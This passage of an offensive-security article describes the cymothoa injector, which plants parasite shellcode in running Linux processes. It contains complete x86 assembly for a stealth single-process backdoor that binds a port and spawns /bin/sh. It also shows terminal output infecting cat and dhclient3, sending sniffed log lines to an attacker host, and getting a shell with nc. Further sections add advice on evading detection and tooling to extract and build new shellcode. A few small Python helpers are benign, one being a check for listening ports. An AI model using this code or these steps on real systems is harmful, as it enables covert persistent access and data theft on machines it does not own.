root@victim# ./cymothoa -p `pidof cat` -s 14 -k 5000 -x attacker_ip -y 5555
[+] attaching to process 4694
register info:
-----------------------------------------------------------
eax value: 0xfffffe00 ebx value: 0x0
esp value: 0xbfa9f3f8 eip value: 0xb77e8430
------------------------------------------------------------
[+] new esp: 0xbfa9f3f4
[+] injecting code into 0xb77e9000
[+] copy general purpose registers
[+] persistent memory at 0xb7805000 (if used)
[+] detaching from 4694
[+] infected!!!
The process is now infected. No new process has been created.
Now, assuming an apache2 server is running, we can try to make some
requests to the server to update /var/log/apache2/access.log (the file
we are monitoring).
root@attacker# curl victim_ip
<html><body><h1>It works!</h1>
<p>This is the default web page for this server.</p>
<p>The web server software is running but no content has been added.</p>
</body></html>
If everything worked properly we should see, in the console of the UDP
server, the new lines generated by our requests:
root@attacker# ./udp_server 5555
./udp_server: listening on port UDP 5555
::1 - - [26/May/2011:11:18:57 +0200] "GET / HTTP/1.1" 200 460 "-"
"curl/7.19.7 (i486-pc-linux-gnu) libcurl/7.19.7 OpenSSL/0.9.8k
zlib/1.2.3.3 libidn/1.15"
::1 - - [26/May/2011:11:19:26 +0200] "GET / HTTP/1.1" 200 460 "-"
"curl/7.19.7 (i486-pc-linux-gnu) libcurl/7.19.7 OpenSSL/0.9.8k
zlib/1.2.3.3 libidn/1.15"
...
Et voila, we have a remote file sniffer!
Of course the connections do not appear in the output of tools like
netstat, as they are only brief exchanges of data, and sockets are open
only when the monitored file has new lines (and immediately closed).
Some notes on the proper use of this preamble and parasite:
- This preamble is usually not compatible with existing shellcode.
The code must be modified to return the execution to the
host process, restoring stack and registers.
- It is better to inject the parasite into servers that run for as long
as the machine is on, but use little CPU time. The server
dhclient3 is a perfect host.
------------[ 5.3 Single process backdoor
We have just arrived at the last and perhaps most interesting example of
a parasite in this document.
This is what the author wanted to obtain: a backdoor that can live within
another process, without calls to fork() and without creating new threads.
The backdoor listens on a port (customizable by the injector), and
periodically checks if a client is connected. This part has been
implemented using nonblocking sockets and a modified alarm() preamble.
When a client is connected, it obtains a shell: the only time a call
to fork() is made.
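The polling idea is ordinary socket programming and can be shown outside
of any injection context. Below is a minimal Python sketch, assuming a
loopback-only listener and a kernel-chosen port; make_listener() and
poll_once() are names invented for this example. It only shows how a
non-blocking accept() reports "nobody is there" instead of sleeping.

```python
import socket

def make_listener(port=0, backlog=16):
    """Create a TCP listening socket whose accept() never blocks."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    s.bind(("127.0.0.1", port))   # loopback only in this sketch
    s.listen(backlog)
    s.setblocking(False)          # sets O_NONBLOCK on the descriptor
    return s

def poll_once(listener):
    """Return a connected socket if a client is waiting, else None."""
    try:
        conn, _addr = listener.accept()
    except BlockingIOError:       # EAGAIN/EWOULDBLOCK: no pending client
        return None
    return conn
```

Because poll_once() returns immediately in both cases, it can be called
from a periodic timer without ever stalling the caller.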
As long as the backdoor is in listening mode, the only way to notice its
presence is to check the listening ports on the machine, but even in this
case we can use some tricks to make our parasite very difficult to detect.
Here's the code.
%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%
#
# Single process backdoor (alarm preamble)
#
handler:
pusha
set_signal_handler:
# signal(SIGALRM, handler)
xorl %eax, %eax
xorl %ebx, %ebx
mov $48, %al
mov $14, %bl
jmp set_signal_handler_end
load_handler:
pop %ecx
subl $0x18, %ecx # adjust %ecx to point handler()
int $0x80
jmp shellcode
set_signal_handler_end:
call load_handler
shellcode:
# check if already initialized
mov $0x4d454d50, %esi # replaced by the injector
# (persistent memory address)
mov (%esi), %eax
cmp $0xdeadbeef, %eax
je accept_call # jump if already initialized
socket_call:
# call to sys_socketcall($0x01 (socket), *args)
xorl %eax, %eax
mov $102, %al
xorl %ebx, %ebx
mov $0x01, %bl
jmp socket_args
load_socket_args:
pop %ecx
int $0x80 # %eax = socket descriptor
# save socket descriptor
mov $0xdeadbeef, %ebx
mov %ebx, (%esi)
add $4, %esi
mov %eax, (%esi)
sub $4, %esi
jmp fcntl_call
socket_args:
call load_socket_args
.long 0x02 # AF_INET
.long 0x01 # SOCK_STREAM
.long 0x00 # NULL
fcntl_call:
# call to sys_fcntl(socket, F_GETFL)
mov %eax, %ebx
xorl %eax, %eax
mov $55, %al
xorl %ecx, %ecx
mov $3, %cl
int $0x80
# call to sys_fcntl(socket, F_SETFL, flags | O_NONBLOCK)
mov %eax, %edx
xorl %eax, %eax
mov $55, %al
mov $4, %cl
orl $0x800, %edx # O_NONBLOCK (nonblocking socket)
int $0x80
bind_call:
# prepare sys_socketcall (bind) arguments
jmp struct_sockaddr
load_sockaddr:
pop %ecx
push $0x10 # sizeof(struct_sockaddr)
push %ecx # struct_sockaddr address
push %ebx # socket descriptor
# call to sys_socketcall($0x02 (bind), *args)
xorl %eax, %eax
mov $102, %al
xorl %ebx, %ebx
mov $0x02, %bl
mov %esp, %ecx
int $0x80
jmp listen_call
struct_sockaddr:
call load_sockaddr
.short 0x02 # AF_INET
.short 0x5250 # PORT (replaced by the injector)
.long 0x00 # INADDR_ANY
listen_call:
pop %eax # socket descriptor
pop %ebx
push $0x10 # queue (backlog)
push %eax # socket descriptor
# call to sys_socketcall($0x04 (listen), *args)
xorl %eax, %eax
mov $102, %al
xorl %ebx, %ebx
mov $0x04, %bl
mov %esp, %ecx
int $0x80
# restore stack
pop %edi
pop %edi
pop %edi
accept_call:
# prepare sys_socketcall (accept) arguments
xorl %ecx, %ecx
push %ecx # socklen_t *addrlen
push %ecx # struct sockaddr *addr
add $4, %esi
push (%esi) # socket descriptor
# call to sys_socketcall($0x05 (accept), *args)
xorl %eax, %eax
mov $102, %al
xorl %ebx, %ebx
mov $0x05, %bl
mov %esp, %ecx
int $0x80 # %eax = file descriptor or negative (on error)
mov %eax, %edx # save file descriptor
# restore stack
pop %edi
pop %edi
pop %edi
# check return value
test %eax, %eax
js schedule_next_and_return # jump on error (negative %eax)
fork_child:
# call to sys_fork()
xorl %eax, %eax
mov $2, %al
int $0x80
test %eax, %eax
jz dup2_multiple_calls # child continue execution
# parent schedule_next_and_return
schedule_next_and_return:
# call to sys_close(socket file descriptor)
# (since is used only by the child process)
xorl %eax, %eax
mov $6, %al
mov %edx, %ebx
int $0x80
# call to sys_waitpid(-1, NULL, WNOHANG)
# (to remove zombie processes)
xorl %eax, %eax
mov $7, %al
xorl %ebx, %ebx
dec %ebx
xorl %ecx, %ecx
xorl %edx, %edx
mov $1, %dl
int $0x80
# alarm(timeout)
xorl %eax, %eax
mov $27, %al
movl $0x53434553, %ebx # replaced by the injector (seconds)
int $0x80
# return
popa
ret
dup2_multiple_calls:
# dup2(socket, 2), dup2(socket, 1), dup2(socket, 0)
xorl %eax, %eax
xorl %ecx, %ecx
mov %edx, %ebx
mov $2, %cl
dup2_loop:
mov $63, %al
int $0x80
dec %ecx
jns dup2_loop
execve_call:
# call to sys_execve(program, *args)
xorl %eax, %eax
mov $11, %al
jmp program_path
load_program_path:
pop %ebx
# create argument list [program_path, NULL]
xorl %ecx, %ecx
push %ecx
push %ebx
mov %esp, %ecx
mov %esp, %edx
int $0x80
program_path:
call load_program_path
.ascii "/bin/sh"
%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%
A little summary of the code:
1) Half preamble, only the signal() part.
2) Check to see if it's the first execution. This step makes use of a
persistent memory location, provided by the injector.
2.1) If already initialized jump to 7
2.2) If not initialized continue
3) Open socket.
4) Set nonblocking using fcntl().
5) Bind socket to the specified port.
6) Socket in listen mode with listen().
7) Check if a client is connected using accept().
7.1) No clients, jump to 9
7.2) Client connected, continue
8) Fork() a child process and execute a shell.
9) Set the timer and resume host execution
(the second half of the preamble)
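Step 2 relies on a simple layout of the persistent memory area: a marker
word at offset 0 and the socket descriptor at offset 4. A small Python
model of that layout follows, using a bytearray in place of the real
memory; the helper names are hypothetical, only the 0xdeadbeef marker and
the two offsets come from the listing.

```python
import struct

MAGIC = 0xdeadbeef  # marker value used by the listing

def is_initialized(mem):
    """True if the first 32-bit word of the area holds MAGIC."""
    (word,) = struct.unpack_from("<I", mem, 0)
    return word == MAGIC

def mark_initialized(mem, descriptor):
    """Store MAGIC at offset 0 and the descriptor at offset 4."""
    struct.pack_into("<II", mem, 0, MAGIC, descriptor)

def saved_descriptor(mem):
    """Read back the descriptor stored at offset 4."""
    (fd,) = struct.unpack_from("<I", mem, 4)
    return fd
```

On the first run is_initialized() is false, so steps 3 to 6 are executed
once; every later run finds the marker and goes straight to step 7.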
For this shellcode the provided arguments are a persistent memory
address, the port to listen on and the timer (in seconds).
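In the listing these three arguments appear as placeholder constants.
Decoded as little-endian bytes they read as short ASCII tags, which is
presumably what makes them easy to spot in the assembled payload (this is
my reading of the constants, not a description of how the injector
searches for them). The Python sketch below decodes them and also shows
how a port number is laid out in network byte order; port_field() is a
hypothetical helper.

```python
import struct

# Placeholder constants copied from the listing.
PLACEHOLDERS = {
    "persistent memory": struct.pack("<I", 0x4d454d50),
    "port":              struct.pack("<H", 0x5250),
    "seconds":           struct.pack("<I", 0x53434553),
}

def port_field(port):
    """sin_port bytes as stored in memory: network (big-endian) order."""
    return struct.pack("!H", port)

if __name__ == "__main__":
    for name, raw in PLACEHOLDERS.items():
        print(f"{name:18} {raw.hex()}  {raw.decode('ascii')}")
    print("port 68 ->", port_field(68).hex())
```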
Finally, let's see a practical example of use.
First, we must identify our host process. We also need to find a port that
is not likely to arouse suspicion.
root@victim# lsof -a -i -c dhclient3
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
dhclient3 1232 root 5u IPv4 4555 0t0 UDP *:bootpc
dhclient3 1612 root 4u IPv4 4554 0t0 UDP *:bootpc
Here we can see two dhclient3 processes with port 68/UDP open (bootpc): a
good strategy for our backdoor is to listen on port 68/TCP...
root@victim# ./cymothoa -p 1612 -s 13 -j 1 -y 68
[+] attaching to process 1612
register info:
-----------------------------------------------------------
eax value: 0xfffffdfe ebx value: 0x6
esp value: 0xbfff6dd0 eip value: 0xb7682430
------------------------------------------------------------
[+] new esp: 0xbfff6dcc
[+] injecting code into 0xb7683000
[+] copy general purpose registers
[+] persistent memory at 0xb769f000 (if used)
[+] detaching from 1612
[+] infected!!!
Let's see the result:
root@victim# lsof -a -i -c dhclient3
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
dhclient3 1232 root 5u IPv4 4555 0t0 UDP *:bootpc
dhclient3 1612 root 4u IPv4 4554 0t0 UDP *:bootpc
dhclient3 1612 root 7u IPv4 21892 0t0 TCP *:bootpc (LISTEN)
As you can see, it is very hard to tell that something is wrong...
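Seen from the administrator's side, the listening port is the one visible
trace, so comparing the TCP ports in LISTEN state against a known list is
the obvious check. A minimal Python sketch, assuming the Linux
/proc/net/tcp text format (state 0A is LISTEN, addresses are hexadecimal);
the function names and the allow-list are hypothetical.

```python
def listening_tcp_ports(proc_net_tcp_text):
    """Return the sorted local ports found in LISTEN state (st == 0A)."""
    ports = set()
    for line in proc_net_tcp_text.splitlines()[1:]:  # skip header row
        fields = line.split()
        if len(fields) < 4:
            continue
        local, state = fields[1], fields[3]
        if state == "0A":                             # TCP_LISTEN
            ports.add(int(local.rsplit(":", 1)[1], 16))
    return sorted(ports)

def unexpected(ports, allowed):
    """Ports that are listening but missing from the allow-list."""
    return [p for p in ports if p not in allowed]

if __name__ == "__main__":
    with open("/proc/net/tcp") as f:
        print(unexpected(listening_tcp_ports(f.read()), {22}))
```

A port that is normally UDP-only, such as bootpc, showing up here as a TCP
listener would stand out in this kind of comparison even though it looks
innocent in the lsof output.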
Now the attacker can connect to the victim and get a shell:
root@attacker# nc -vv victim_ip 68
Connection to victim_ip 68 port [tcp/bootpc] succeeded!
uname -a
Linux victim 2.6.38 #1 SMP Thu Mar 17 20:52:18 EDT 2011 i686 GNU/Linux
We have achieved our goal: a single process backdoor :)
------[ 6. Something about the injector
In all these examples we used the injector cymothoa [4].
Some notes about this tool...
The injector is very important because it allows the customization of the
shellcode and its injection in the right areas of memory.
Cymothoa also aims to be an aid to shellcode development, in several ways.
The payloads directory contains all the assembly sources created by the
author, which can be easily assembled with gcc:
root@box# cd payloads
root@box# ls
clone_shellcode.s fork_shellcode.s
scheduled_backdoor_alarm.s mmx_example_shellcode.s
scheduled_setitimer.s scheduled_alarm.s
scheduled_tail_setitimer.s
root@box# gcc -c scheduled_backdoor_alarm.s
root@box#
Cymothoa also includes some tools to easily extract the shellcode from
these object files.
For example bgrep [6], a binary grep, which finds the offsets of
particular hexadecimal sequences:
root@box# ./bgrep e8f0ffffff payloads/scheduled_backdoor_alarm.o
payloads/scheduled_backdoor_alarm.o: 0000014b
This is useful for finding the beginning of the code to extract.
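The search itself is simple enough to reproduce when bgrep is not at hand.
This is a rough Python equivalent, not bgrep's actual implementation;
find_hex() is a name chosen for this example.

```python
def find_hex(data, hex_pattern):
    """Return every offset at which the byte sequence occurs in data."""
    needle = bytes.fromhex(hex_pattern)
    offsets = []
    start = data.find(needle)
    while start != -1:
        offsets.append(start)
        start = data.find(needle, start + 1)
    return offsets

if __name__ == "__main__":
    import sys
    pattern, path = sys.argv[1], sys.argv[2]
    with open(path, "rb") as f:
        for off in find_hex(f.read(), pattern):
            print(f"{path}: {off:08x}")
```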
Once you locate the beginning and the length of the code, you can easily
turn it into a C string with the script hexdump_to_cstring.pl.
root@box# hexdump -C -s 52 payloads/scheduled_backdoor_alarm.o -n 291 | \
./hexdump_to_cstring.pl
\x60\x31\xc0\x31\xdb\xb0\x30\xb3\x0e\xeb\x08\x59\x83\xe9\x18\xcd\x80\xeb
\x05\xe8\xf3\xff\xff\xff\xbe\x50\x4d\x45\x4d\x8b\x06\x3d\xef\xbe\xad\xde
\x0f\x84\x81\x00\x00\x00\x31\xc0\xb0\x66\x31\xdb\xb3\x01\xeb\x14\x59\xcd
...
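The conversion is just a byte-to-escape mapping. The following Python
sketch does the same job under stated assumptions: it is not the
hexdump_to_cstring.pl script, extract() and to_cstring() are hypothetical
names, and the 18 bytes per line simply mirror the output shown above.

```python
def extract(path, offset, length):
    """Read length bytes at offset (like hexdump -s offset -n length)."""
    with open(path, "rb") as f:
        f.seek(offset)
        return f.read(length)

def to_cstring(data, per_line=18):
    r"""Render bytes as \xNN escapes, per_line bytes on each line."""
    lines = []
    for i in range(0, len(data), per_line):
        chunk = data[i:i + per_line]
        lines.append("".join(f"\\x{b:02x}" for b in chunk))
    return "\n".join(lines)
```

With the offset and length from the example, the call would be
to_cstring(extract("payloads/scheduled_backdoor_alarm.o", 52, 291)).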
Once this is done you can add this string to the file payloads.h, and
recompile cymothoa, to have a new, ready to inject, parasite.
If you want to turn code you already have into a parasite, that's the
easy way.
The last thing I want to mention about cymothoa, is a little utility
shipped with the main tool: a syscall code generator.
Writing syscall-based shellcode can be tedious work, especially if
you must remember every syscall number and its parameters.
Since I am a lazy person, I've written a script able to do part of
the hard work:
root@box# ./syscall_code.pl
Syscall shellcode generator
Usage:
./syscall_code.pl syscall
For example you can use it to generate the calling sequence for the
open syscall:
root@box# ./syscall_code.pl sys_open
sys_open_call:
# call to sys_open(filename, flags, mode)
xorl %eax, %eax
mov $5, %al
xorl %ebx, %ebx
mov filename, %bl
xorl %ecx, %ecx
mov flags, %cl
xorl %edx, %edx
mov mode, %dl
int $0x80
As you can see the script generates assembly code that marks arguments and
corresponding registers of the syscall, as well as the call number.
The code is not always 100% reliable (e.g. some syscalls require complex
structures the script is not able to construct), but it can greatly speed
up the shellcode development phase.
I hope you'll find it useful...
------[ 7. Further reading
While I was writing this article, the talks scheduled for the next edition
of defcon were published on the conference website.
One of these caught my attention [7]:
Jugaad - Linux Thread Injection Kit
"... The kit currently works on Linux, allocates space inside
a process and injects and executes arbitrary payload as a
thread into that process. It utilizes the ptrace() functionality
to manipulate other processes on the system. ptrace() is an API
generally used by debuggers to manipulate(debug) a program.
By using the same functionality to inject and manipulate the
flow of execution of a program Jugaad is able to inject the
payload as a thread."
I recommend that all readers who found this article interesting follow
this talk, because it is research similar to mine, carried out in parallel.
My goal was to implement a stealth backdoor without creating new processes
or threads, while Aseem's research focuses on the creation of threads
to achieve the same level of stealthiness.
I therefore offer my best wishes to Aseem, since I think our works are
complementary.
For additional material on "injection of code" you can see the links
listed at the end of the document.
Bye bye ppl ;)
Greetings (in random order): emgent, scox, white_sheep (and all ihteam),
sugar, renaud, bt_smarto, cris.
------[ 8. Links and references
[0] https://secure.wikimedia.org/wikipedia/en/wiki/Ptrace
[1] http://dl.packetstormsecurity.net/papers/unix/elf-runtime-fixup.txt
[2] http://www.phrack.org/issues.html?issue=58&id=4#article
(5 - The dynamic linker's dl-resolve() function)
[3] http://vxheavens.com/lib/vrn00.html#c42
[4] http://cymothoa.sourceforge.net/
[5] http://www.exploit-db.com/exploits/13388/
[6] http://debugmo.de/2009/04/bgrep-a-binary-grep/
[7] https://www.defcon.org/html/defcon-19/dc-19-speakers.html#Jakhar
------[ EOF